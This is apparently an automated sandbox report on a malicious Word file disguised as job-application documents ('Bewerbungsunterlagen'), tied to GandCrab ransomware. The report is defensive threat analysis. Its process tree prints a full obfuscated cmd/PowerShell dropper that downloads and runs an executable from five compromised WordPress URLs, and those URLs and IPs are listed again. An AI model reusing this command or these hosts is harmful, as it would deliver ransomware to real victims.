File name: | Bewerbungsunterlagen.doc |
Full analysis: | https://app.any.run/tasks/f08bc82d-49f4-43c2-86b6-12d7af673829 |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
Analysis date: | July 17, 2019, 06:47:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 288C4244C2B319CD77020C0FEED5F5C8 |
SHA1: | F66EA46B0A8207058B0AC70F51D5CA6B4E58C869 |
SHA256: | CC970A5B94A07FF24A31872235A925964712798232B4AB8161A547F77EB3AD63 |
SSDEEP: | 3072:Rn9luBFybB2v5gc4ftqpoJ2O/fmjOc5ZkDVliD/S:RHstf4M6J2KfNOkDPKa |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0006 |
ZipCompression: | Deflated |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCRC: | 0xb743dea4 |
ZipCompressedSize: | 424 |
ZipUncompressedSize: | 1505 |
ZipFileName: | [Content_Types].xml |
Template: | Normal.dotm |
---|---|
TotalEditTime: | 2.4 hours |
Pages: | 1 |
Words: | 57 |
Characters: | 4832 |
Application: | Microsoft Office Word |
DocSecurity: | None |
Lines: | 40 |
Paragraphs: | 9 |
ScaleCrop: | No |
HeadingPairs: |
|
TitlesOfParts: | - |
Company: | - |
LinksUpToDate: | No |
CharactersWithSpaces: | 4880 |
SharedDoc: | No |
HyperlinksChanged: | No |
AppVersion: | 12 |
LastModifiedBy: | Admin |
RevisionNumber: | 140 |
CreateDate: | 2019:04:11 06:44:00Z |
ModifyDate: | 2019:04:11 12:47:00Z |
Creator: | home |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3416 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bewerbungsunterlagen.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3584 | cmd.exe /c set p1=pow&& set p2=ersh&& set s1=ell&& call %p1%%p2%%s1% -w hidden iex('$MnbeD = new-object -comobject wscript.shell;$Aue4d = new-object system.net.webclient;$Uoiq83HJ = new-object random;$Niq83 = \"http://vetersvobody.ru/wp-content/plugins/loco-translate/src/fs/pohkak0.exe,http://staging.proshore.nl/wp-content/themes/twentyseventeen/assets/css/pohkak0.exe,http://aloes-ogrody.prv.pl/wp-content/themes/twentythirteen/pohkak0.exe,http://jindrichmarek.cz/wp-content/themes/webpoint/pohkak0.exe,http://www.bellingusto.it/wp-content/uploads/revslider/templates/clearview_menu/pohkak0.exe\".split(\",\");$Iowu3DF = $Uoiq83HJ.next(1, 65536);$Uqjn38Zc = \"c:\windows\temp\nt44.exe\";foreach($ftvAZh in $Niq83){try{$Aue4d.downloadfile($ftvAZh.ToString(), $Uqjn38Zc);start-process $Uqjn38Zc;break;}catch{}}'); | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1816 | powershell -w hidden iex('$MnbeD = new-object -comobject wscript.shell;$Aue4d = new-object system.net.webclient;$Uoiq83HJ = new-object random;$Niq83 = \"http://vetersvobody.ru/wp-content/plugins/loco-translate/src/fs/pohkak0.exe,http://staging.proshore.nl/wp-content/themes/twentyseventeen/assets/css/pohkak0.exe,http://aloes-ogrody.prv.pl/wp-content/themes/twentythirteen/pohkak0.exe,http://jindrichmarek.cz/wp-content/themes/webpoint/pohkak0.exe,http://www.bellingusto.it/wp-content/uploads/revslider/templates/clearview_menu/pohkak0.exe\".split(\",\");$Iowu3DF = $Uoiq83HJ.next(1, 65536);$Uqjn38Zc = \"c:\windows\temp\nt44.exe\";foreach($ftvAZh in $Niq83){try{$Aue4d.downloadfile($ftvAZh.ToString(), $Uqjn38Zc);start-process $Uqjn38Zc;break;}catch{}}'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2252 | "C:\windows\temp\nt44.exe" | C:\windows\temp\nt44.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
3416 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD0CD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1816 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZBG0KWLR7BFHFW94G02C.temp | — | |
MD5:— | SHA256:— | |||
3416 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E2E433A.jpeg | — | |
MD5:— | SHA256:— | |||
3416 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87CC85F3.jpeg | — | |
MD5:— | SHA256:— | |||
3416 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFF772A24D9C1C5B12.TMP | — | |
MD5:— | SHA256:— | |||
3416 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:74CCECCF4BC8CBD8F0E72D43DD4DA017 | SHA256:F8F49383BBA51731112C1643ECDB66ECAC7AFAE7181E34BA2ACA2324387B74DC | |||
1816 | powershell.exe | C:\windows\temp\nt44.exe | executable | |
MD5:51911D84E794B1BDC8D6412664FBB3C4 | SHA256:E2D677C2B61A594263B621EC1AA18AC3F056E2A85C4DB608E30331076153D733 | |||
2252 | nt44.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi | — | |
MD5:— | SHA256:— | |||
2252 | nt44.exe | C:\IIRUMRUJ-MANUAL.txt | text | |
MD5:F2AD6E1F6C7358997E9DDCADF3BA8AD4 | SHA256:A1A0BFE7A06FFCBE31F809CFEE23B9FA5EFB82D17EBE46649AB5F633594BCB1F | |||
2252 | nt44.exe | C:\MSOCache\IIRUMRUJ-MANUAL.txt | text | |
MD5:F2AD6E1F6C7358997E9DDCADF3BA8AD4 | SHA256:A1A0BFE7A06FFCBE31F809CFEE23B9FA5EFB82D17EBE46649AB5F633594BCB1F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1816 | powershell.exe | GET | 301 | 90.156.201.59:80 | http://vetersvobody.ru/wp-content/plugins/loco-translate/src/fs/pohkak0.exe | RU | — | — | malicious |
1816 | powershell.exe | GET | 404 | 217.11.249.141:80 | http://jindrichmarek.cz/wp-content/themes/webpoint/pohkak0.exe | CZ | html | 236 b | malicious |
1816 | powershell.exe | GET | 404 | 87.233.81.66:80 | http://staging.proshore.nl/wp-content/themes/twentyseventeen/assets/css/pohkak0.exe | NL | html | 323 b | malicious |
1816 | powershell.exe | GET | 403 | 176.31.124.7:80 | http://aloes-ogrody.prv.pl/wp-content/themes/twentythirteen/pohkak0.exe | FR | html | 22.1 Kb | malicious |
1816 | powershell.exe | GET | 200 | 89.46.105.61:80 | http://www.bellingusto.it/wp-content/uploads/revslider/templates/clearview_menu/pohkak0.exe | IT | executable | 176 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1816 | powershell.exe | 176.31.124.7:80 | aloes-ogrody.prv.pl | OVH SAS | FR | malicious |
1816 | powershell.exe | 87.233.81.66:80 | staging.proshore.nl | True B.V. | NL | malicious |
1816 | powershell.exe | 217.11.249.141:80 | jindrichmarek.cz | Casablanca INT | CZ | malicious |
1816 | powershell.exe | 90.156.201.59:80 | vetersvobody.ru | LLC masterhost | RU | malicious |
1816 | powershell.exe | 90.156.201.84:443 | vetersvobody.ru | LLC masterhost | RU | malicious |
1816 | powershell.exe | 89.46.105.61:80 | www.bellingusto.it | Aruba S.p.A. | IT | malicious |
Domain | IP | Reputation |
---|---|---|
vetersvobody.ru |
| malicious |
veter-s.ru |
| malicious |
staging.proshore.nl |
| malicious |
aloes-ogrody.prv.pl |
| malicious |
jindrichmarek.cz |
| malicious |
www.bellingusto.it |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
1816 | powershell.exe | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious |
1816 | powershell.exe | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious |
1816 | powershell.exe | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious |
1816 | powershell.exe | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious |
1816 | powershell.exe | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious |
1816 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1816 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |